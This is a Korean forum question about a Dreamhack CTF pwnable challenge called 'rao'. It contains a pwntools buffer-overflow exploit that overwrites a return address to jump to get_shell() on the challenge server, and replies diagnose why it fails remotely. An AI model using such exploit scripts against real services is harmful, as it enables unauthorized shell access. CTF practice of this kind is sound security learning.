계속 Got EOF while reading in interactive만 나오네요
from pwn import *
#x86-64
context.arch = 'amd64'
context.log_level = 'debug'
#dummy code to take the shell
#0x30 for buffer, 0x8 for STB, else for the address of 'get_shell()'
d = b'A' * 0x30 + b'B' * 0x8 + b'\xdd\x11\x40\x00\x00\x00\x00\x00'

#access the server
#ip and port can be changed
#p = process('./rao')
p = remote('host1.dreamhack.games', 10693)

#receive until 'Input: '
p.recvuntil('Input: ')

#send dummy code to server
p.send(d)

#take the shell
p.interactive()

위와 같이 짰는데요. 실행해보면 쉘은 뜨는데 Got EOF while reading in interactive 이거 나오고 아무 반응도 없습니다.
혹시나 해서 서버 말고 로컬로 바꾼 후 실행해보면 잘만 되고요. 강의에서 파이썬으로 인자를 주는 방식으로 입력하는 것도 로컬에서는 잘 되는데 서버에다 하면 또 안 됩니다.
서버에 보낼 때는 뭔가 추가로 해줘야하는건가요?

#pwnable
작성자 정보
답변 2
김진우
대표 업적 없음

일단은 p.send를 p.sendline으로 바꿔보시기 바랍니다. 로컬에서 되셨다면 서버에 값을 전달하는 과정에서 문제가 발생하신 것 같습니다..

김진우
대표 업적 없음

너무나도 열정적이시길래 꼭 해답을 드리고자 문제파일을 까봤는데 get_shell() 주소가 0x4011dd가 아니네요...;; 아마 이름이 rao인 문제가 여러개 있을텐데 헷갈리신게 아닌지.....

질문에 대한 답을 알고 계신가요?
지식을 나누고 포인트를 획득해보세요.
답변하고 포인트 받기